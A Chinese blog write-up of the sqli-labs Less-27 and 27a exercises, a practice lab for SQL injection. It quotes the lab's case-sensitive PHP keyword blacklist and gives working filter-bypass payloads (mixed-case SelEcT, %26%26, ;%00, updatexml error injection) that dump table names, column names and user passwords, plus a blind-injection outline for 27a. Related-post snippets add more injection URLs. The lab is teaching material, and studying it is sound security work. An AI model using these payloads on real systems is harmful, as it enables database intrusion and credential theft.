Less-27and27a

最新推荐文章于 2023-06-20 21:35:35 发布
最新推荐文章于 2023-06-20 21:35:35 发布
阅读量272 收藏
点赞数
分类专栏: # SQL注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43901998/article/details/107359925
版权

文章目录

1. 思路分析

这一关表上上告诉你他只是过滤了unionselect,其实不然。

function blacklist($id)
{
$id= preg_replace('/[\/\*]/',"", $id);		//strip out /*
$id= preg_replace('/[--]/',"", $id);		//Strip out --.
$id= preg_replace('/[#]/',"", $id);			//Strip out #.
$id= preg_replace('/[ +]/',"", $id);	    //Strip out spaces.
$id= preg_replace('/select/m',"", $id);	    //Strip out spaces.
$id= preg_replace('/[ +]/',"", $id);	    //Strip out spaces.
$id= preg_replace('/union/s',"", $id);	    //Strip out union
$id= preg_replace('/select/s',"", $id);	    //Strip out select
$id= preg_replace('/UNION/s',"", $id);	    //Strip out UNION
$id= preg_replace('/SELECT/s',"", $id);	    //Strip out SELECT
$id= preg_replace('/Union/s',"", $id);	    //Strip out Union
$id= preg_replace('/Select/s',"", $id);	    //Strip out select
return $id;
}

过滤掉的东西远比你想象得多。

但是有一个指明的漏洞,就是过滤机制没有使用忽略大小写,那么题目就仅仅只会过滤select,SELECT,Select,而当我们输入一个SelEcT的时候,他是不会过滤的。

其中/m是多行匹配,/s是空白符匹配,因此还是尽量不要使用空格,这里没有对updatexml()进行限制,我们直接用这个注入就好。

2. 注入过程

先看一下原生SQL

$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";

我们的思路就是直接构造id闭合,然后用and连接一个updatexml(),进行报错注入就好了。

这里要注意几点:

  1. 空白字符会被吃到,尽管and没有被过滤,但是还是使用%26%26更方便。
  2. 注释被过滤了,可以使用;%00代替--#
  3. 在进行select查询的时候,使用()来代替空格的分隔作用。

那么首先查看一下数据表:

?id=1' %26%26 updatexml(1,concat('~~',(SelEct(group_concat(table_name)) from(information_schema.tables)where(table_schema="security"))),1);%00

在这里插入图片描述
然后在查users表中的字段有哪些?

?id=1' %26%26 updatexml(1,concat('~~',(SelEct(group_concat(column_name)) from(information_schema.columns)where(table_name="users"%26%26table_schema="security"))),1);%00

在这里插入图片描述
最后查一下账户信息

?id=1' %26%26 updatexml(1,concat('~~',(SelEct(group_concat(password)) from(users))),1);%00

在这里插入图片描述

3. 27a

27a和27的差别就是,将详细的错误信息给屏蔽掉了。
这样可以使用盲注。

?id=1"%26%26(payload);%00

可以自己构造payload进行注入。(通过asciisubstr()length()进行长度检测,字符判断)

老司机开代码
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
STC-GY-27A接线图1
08-04
【STC-GY-27A接线图1】是一个涉及微控制器应用的电路图,主要基于STC89C51单片机。STC89C51是一款8位微控制器,属于51系列,由STC公司生产,具有高性能、低功耗的特点。在电路图中,我们可以看到各种引脚的分配和...
sqli-labs:less-27(过滤select和union)
羽的博客
09-14 494
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; char...
SQL注入分析-less-27
qq_33505576的博客
02-18 1589
SQL注入分析-less-27 **1、 概述:**从本篇开始,后续都会写个概述,简单描述一下对题目的理解,本关的题目是 GET-Error Based-All your UNION&SELECT Belong to us-String-Single quote 中文名称,基于GET型的报错-构造属于你自己的UNION和SELECT-单引号字符型的注入,从名字上来看,这关需要通过报错信息来获取库名、表名、列名和对应字段(列)的数据,同时应该是对单引号敏感。 2、 尝试一下我们的猜想,按照提示,输入参
SQLi LABS Less 23 联合注入+报错注入+布尔盲注
热门推荐
wangyuxiang946的博客
08-15 1万+
SQLi 第二十三关,SQLi-LABS Less-23,SQLi-LABS Less 23,SQLiLABS Less23,SQLi Less 23
(手工)【sqli-labs27、27a】报错回显、布尔盲注、过滤后注入
07-13 878
【SQL-报错、布尔、过滤】
SQL注入详解 23-28关
君莫hacker的博客
10-08 782
目录Less-23Less-24Less-25Less-26Less-27Less-28Less-29Less-30Less-31Less-32Less-33Less-34Less-35Less-36 Less-23 确定注入类型并判断显示位置 -1' union select 22,33,44 and '1'='1 查看当前数据库 -1' union select 3,database(),3 or '12'='12 爆表 -1' union select 22,group_conca
建伍KENWOOD_TH-27A_TH-27E_TH_47A_TH47E英文说明书
10-04
建伍KENWOOD_TH-27A_TH-27E_TH_47A_TH47E英文说明书 在本资源摘要信息中,我们将对建伍KENWOOD公司的TH-27A、TH-27E、TH-47A和TH-47E系列产品的英文说明书进行详细的分析和解读。 一、产品概述 KENWOOD公司是一家...
不同定量方法检测猪背最长肌中ssc-miR-27a表达研究
01-03
不同定量方法检测猪背最长肌中ssc-miR-27a表达研究,虞德兵,,miRNA 是一类长度为21-25nt 的非编码RNA,通过与靶基因的3′UTR 区结合来调控基因表达,在调节生物体生长、发育、疾病发生过程等方面发�
1.5KE27A的技术参数
12-10
1. 雪崩电压(VBR):在1.5KE27A中,雪崩电压为27伏。雪崩电压是指二极管在反向偏置时,电流开始剧烈增加的电压点。当超过这个电压,电子会在内部发生雪崩倍增效应,导致电流急剧上升。这个参数对于确定二极管能够...
The tumor suppressor Sprouty2 is directly regulated by miR-21 and miR-27a in human hepatocellular carcinoma
02-20
微小RNA miR-21和miR-27a调控抑癌基因Sprouty2在肝癌中的表达,丁洁,黄胜林,Sprouty2基因是Ras/ERK通路抑制剂,在很多肿瘤中下调,但为何下调的机理还不清楚。本文发现两个微小RNA miR-21和miR-27a可直接调控...
Sqli-labs之Less-27和Less-27a
→_→
04-26 1915
Less-27 基于错误_GET_过滤UNION/SELECT_单引号_字符型注入 测试注入字符类型: ?id=2'%26%26 '1'='1 (id=2的用户说明不带括号,id=1的用户说明带括号) 由此得出,这是单引号字符型注入。(不带小括号的) 根据提示...
sqli-labs详解------持续更新
yuqie的博客
06-20 3475
如今已经很少使用手动注入了,写这篇的初心在于掌握并熟记手动注入,
sqli-labs Less-26、26a、27、27a、28、28a(sqli-labs闯关指南 26、26a、27、27a、28、28a)—Advanced injection
m0_54899775的博客
12-25 1330
sqli-labs Less-26、26a、27、27a、28、28a(sqli-labs闯关指南 26、26a、27、27a、28、28a)—Advanced injection
SQLi-LABS Less-27到Less-28a
m0_64898960的博客
04-29 176
Less-27题目 经过测试发现需要“ ’ ”进行闭合… 尝试猜字段,发现除了空格和注释符,一些内容好像又可以用了,如or… 不能使用union和select 我们可以通过间接大小写来达到或者像union里面再塞一个union来达到绕过的效果… 开始爆数据库 这里使用了-1发现“ - ”好像被过滤了,改为100 下面的注入照常,只要注意一下union和select的输入即可 Less-27a题目 测试出闭合条件“ " ” 经过尝试,没有报错的回显…可以用题目说的盲注也可以大小写union和sel
sqli-labs ————less -27(union、SELECT、绕过滤)
Fly_鹏程万里
05-19 1930
Less-27从提示界面中我们可以看出这一小节对union、select进行了绕过,那么我们下面来看看源代码吧:SQL语句:$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";过滤机制:function blacklist($id) { $id= preg_replace('/[\/\*]/',"", $id); //strip out /* ...
sqli-labs ————less -27a(union、SELECT、绕过滤)
Fly_鹏程万里
05-16 689
Less-27a本关与第27关的去呗在于对于ID的处理,这里使用了“ ””,同时mysql的错误提示被屏蔽,所以报错注入无法进行。对于过滤的绕过技巧在上一节中已经讲过了,这里不再多说了。下面给出一个payload:http://192.168.11.136/sqli-labs/Less-27a?id=1"%a0UnIon%a0SElecT%a01,user(),"3读者有兴趣可以自己测试哈!...
less学习笔记--27/8/17
yulin009的博客
08-27 230
less最新官网 http://less.bootcss.com/ Less 是一种动态的样式语言。Less扩展了CSS的动态行为,比如说,设置变量(Variables)、混合书写模式(mixins)、操作(operations)和功能(functions)等等,最棒的是,Less使用了现有的CSS语法,也就是说,你可以直接把你现成的样式文件“style.css”直接改成“style.le
sqli-less27过滤注入
青空桑
05-22 278
sqli-less27过滤注入 一、检查网站 127.0.0.1/sqli/less-27/?id=1' 1、可以发现空格被过滤了 空格的部分替换方法:/%0a/、%0a、%09 2、–+也被过滤了 可以选择封装代码:简单来说就是代码结尾加上 ,’ 二、爆数据库名 编写思路:1、过滤部分(空格,–+,大小写)2、查询思路 ?id=0%27%0aUNIon%0aSElect%0a1,database(),%27 三、爆表名 id=0%27%0aUNIon%0aSElect%0a1,(SELEct%0a
Sqli-Labs做题笔记:Less-27 - Less-31
Forever_Han13的博客
01-24 1685
Less-27: http://localhost/sqlilabs/Less-27/?id=0%27%0AUnIon%0ASelECT%0A1,(SeLeCT%0Agroup_concat(concat_ws(%27-%27,id,username,password))%0Afrom%0Ausers%0A%0A),3;%00 Less-27a http://localhost/sqlilabs/Less-27a/?id=0%22%0AUnIon%0ASelECT%0A1,(SeLeCT%0Agroup_
sqli-labs27a
最新发布
06-07
27A是Sqli-Labs中的一个具体任务,这个编号代表该挑战的难度等级,每个任务会逐渐递增,让你逐步理解和应对更复杂的SQL注入场景。 在Sqli-Labs27a中,你可能会遇到一个需要利用SQL注入技术来访问数据库、绕过权限...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值